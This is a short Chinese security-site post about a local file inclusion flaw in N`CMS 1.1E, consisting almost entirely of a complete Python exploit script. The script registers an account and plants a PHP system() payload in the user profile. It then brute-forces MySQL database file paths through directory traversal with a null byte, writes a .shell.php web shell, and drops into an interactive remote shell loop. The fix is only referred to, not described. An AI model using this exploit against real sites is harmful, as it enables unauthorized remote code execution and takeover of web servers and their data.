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N`CMS 1.1E 本地文件包含漏洞及修复

添加时间:2011-3-12  添加: admin 

N`CMS 是一款内容管理系统,N`CMS 存在本地文件包含漏洞,可能导致敏感信息泄露。

N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit

#!/usr/bin/python  # ~INFORMATION  # Exploit Title:    N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit  # Date:         11/3/2011  # Software link:    http://bit.ly/eJAyw5  # Tested on:        Linux bt  # Version:      1.1E  # PHP.ini Settings: gpc_magic_quotes = Off     # Note: The web application was lucky to not be exploited by session   # injection with a malicious username example <?php system($_GET[cmd])>   # as htmlentities() encoded the bracket :-)     # ~VULNERABLE CODE  '''  <?php  if( isset( $_GET['page'] ) )  {      if( file_exists( 'page/'.$_GET['page'].'.php' ) )      {          include( 'page/'.$_GET['page'].'.php' );      }      else      {          include( 'page/404.php' );      }  }  else  {      include( 'page/home.php' );  }  ?>  ''' import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass  from optparse import OptionParser  from urlparse import urlparse,urljoin  from urllib import urlopen  from cookielib import CookieJar     __CONTACT__ ="TecR0c(tecr0c@tecninja.net)" __DATE__ ="11.3.2011"    usage = 'Example : %s http://localhost/ncms/ -c user:pass -w databases.txt -p' % __file__  parser = OptionParser(usage=usage)  parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",          help="HTTP Proxy <server>:<port>")  parser.add_option("-w","--wordlist", type="string",action="store", dest="wordlist",          help="file to use to bruteforce database")  parser.add_option("-c","--credentials", type="string",action="store", dest="credentials",default="hacker:ph33r",          help="credentials for login, "     "or [default: %default]")     (options, args) = parser.parse_args()     if options.proxy:      print '[+] Using Proxy'+options.proxy     # User Agents  agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",          "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",          "Google Chrome (Windows XP)",          "Opera 9.25 (Windows Vista)",          "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",          "Opera/8.00 (Windows NT 5.1; U; en)"]  agent = random.choice(agents)     traversal = './../../../../../../../..'    def banner():      if os.name == "posix":          os.system("clear")      else:          os.system("cls")      header = '''  |----------------------------------------|  |Exploit: N'CMS LFI RCE  |Author: %s  |Date: %s  |----------------------------------------|\n  '''%(__CONTACT__,__DATE__)      for i in header:          print "\b%s"%i,          sys.stdout.flush()          time.sleep(0.005)     def proxyCheck():          if options.proxy:                  try:                          h2 = httplib.HTTPConnection(options.proxy)                          h2.connect()                          print "[+] Using Proxy Server:",options.proxy                  except(socket.timeout):                          print "[-] Proxy Timed Out\n"                         pass                         sys.exit(1)                  except(NameError):                          print "[-] Proxy Not Given\n"                         pass                         sys.exit(1)                  except:                          print "[-] Proxy Failed\n"                         pass                         sys.exit(1)     def getProxy():          try:                  proxy_handler = urllib2.ProxyHandler({'http': options.proxy})          except(socket.timeout):                  print "\n[-] Proxy Timed Out"                 sys.exit(1)          return proxy_handler     cj = CookieJar()  if options.proxy:      opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))  else:      opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  opener.addheaders = [('User-agent', agent)]     def registerUser():          webSiteUrl = url.geturl()+"?page=register"     parameters = {'login' : username,'password': password,'password2' : password,'email' : 'test@test.com',      'register' : '+Enregistrer+'}      encodedParameters = urllib.urlencode(parameters)      try:          opener.open(webSiteUrl, encodedParameters).read()      except:          print '[-] Failed'         sys.exit()      print '[+] Created User, '+username      def edit_profile():          webSiteUrl = url.geturl()+"?page=edit_profil"     parameters = { 'User-Agent' : agent,      'profil' : '<?php system(base64_decode($_REQUEST["cmd"]));?>','edit_profil' : '+Enregistrer+'}      encodedParameters = urllib.urlencode(parameters)      try:          response = opener.open(webSiteUrl, encodedParameters).read()      except:          print '[-] Failed'         sys.exit()      print '[+] Added Payload To Page'    def login():          """ Add php payload to database """         webSiteUrl = url.geturl()+"?page=register"     parameters = {'login' : username,'password' : password,'actplayer' : 'login'}      encodedParameters = urllib.urlencode(parameters)      try:          opener.open(webSiteUrl, encodedParameters).read()      except:           print '[-] Failed'         sys.exit()      print '[+] Authenticated To Website'    def traversalCmd(encodedCommand,database):      webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/"+database+"/accounts.MYD%00"     parameters = {'cmd' : encodedCommand}      encodedParameters = urllib.urlencode(parameters)      try:          opener.open(webSiteUrl, encodedParameters).read()      except:          print '[-] Failed'         sys.exit()     def postRequestWebShell(encodedCommand):          webSiteUrl = url.geturl()+'.shell.php'     commandToExecute = [      ('cmd',encodedCommand)]      cmdData = urllib.urlencode(commandToExecute)      try:          response = opener.open(webSiteUrl, cmdData).read()      except:          print '[-] Failed'         sys.exit()      return response     def fileCheck():          webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/mysql_upgrade_info%00"     try:          response = opener.open(webSiteUrl).read()      except:          print '[-] Failed'         sys.exit()      doesntExist = re.compile(r"Erreur 404")      findAnswer = doesntExist.search(response)      if findAnswer:          "[-] Can Not Use This Techinque"         sys.exit()     def bruteForceDatabase():      try:              databases = open(options.wordlist, "r").readlines()              print "[+] Length Of Wordlist: "+str(len(databases))      except(IOError):              print "[-] Error: Check Your Wordlist Path\n"             sys.exit(1)      for database in databases:              database = database.replace("\r","").replace("\n","")              webSiteUrl = url.geturl()+"?page="+traversal+"/var/lib/mysql/"+database+"/accounts.MYD%00"         print '[X] Testing Database Name: '+database          try:              response = opener.open(webSiteUrl).read()          except urllib2.HTTPError, error:                              print '[-] Failed'         payload = re.compile(r"Erreur 404")          findPayload = payload.search(response)          if not findPayload:              print '[+] Found Database: '+database+'\n'             commandLine(database)     def commandLine(database):      encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"     encodedCommand = base64.b64encode(encodedCommand)      traversalCmd(encodedCommand,database)      commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)      while True:          try:              command = raw_input(commandLine)              encodedCommand = base64.b64encode(command)              response = postRequestWebShell(encodedCommand)              print response          except KeyboardInterrupt:              encodedCommand = base64.b64encode('rm .shell.php')              postRequestWebShell(encodedCommand)              print "\n[!] Removed .shell.php\n"             sys.exit()     if "__main__" == __name__:          banner()      try:              url=urlparse(args[0])      except:              parser.print_help()              sys.exit()      getProxy()      username, password = options.credentials.split(':')      proxyCheck()      registerUser()      login()      edit_profile()      fileCheck()      bruteForceDatabase() 修复:本地包含漏洞修复请查阅本站



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